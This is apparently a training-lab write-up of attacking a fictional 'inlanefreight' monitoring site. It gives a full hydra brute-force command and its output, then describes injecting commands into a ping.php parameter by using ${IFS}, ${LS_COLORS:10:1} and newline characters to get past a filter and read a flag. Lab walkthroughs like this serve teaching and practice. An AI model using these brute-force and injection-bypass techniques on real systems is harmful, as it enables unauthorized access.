monitoring.inlanefreight.local
Its redirects us to a simple login page
Noting that it uses POST request. Now we brute force it for passwords using admin as the username.
hydra -l admin -P /usr/share/wordlists/seclists/Passwords/darkweb2017-top1000.txt monitoring.inlanefreight.local http-post-form "/login.php:username=admin&password=^PASS^:Invalid Credentials!" -I -t 48
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-18 17:30:46
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 48 tasks per 1 server, overall 48 tasks, 999 login tries (l:1/p:999), ~21 tries per task
[DATA] attacking http-post-form://monitoring.inlanefreight.local:80/login.php:username=admin&password=^PASS^:Invalid Credentials!
[80][http-post-form] host: monitoring.inlanefreight.local login: admin password: 12qwaszx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-18 17:30:50Its a web shell:
Connection_test sends a GET request to /ping.php
Send it to repeater and we see that it tries to ping 127.0.0.1 and OUTPUTS it
Trying different command injections. The space character (127.0.0.1%20) doesn't work but 127.0.0.1${IFS} works.
For operators, semicolor ; doesn't work but ${LS_COLORS:10:1} works.
So far it looks like this:
Space character doesn't allow adding other commands and operators. So that was a failure. New line character is not blacklisted and it allows us to run other commands with slight modification
I was able to use the cat command which isn't blacklisted to read the flag. Using ${IFS} for space character.
Last updated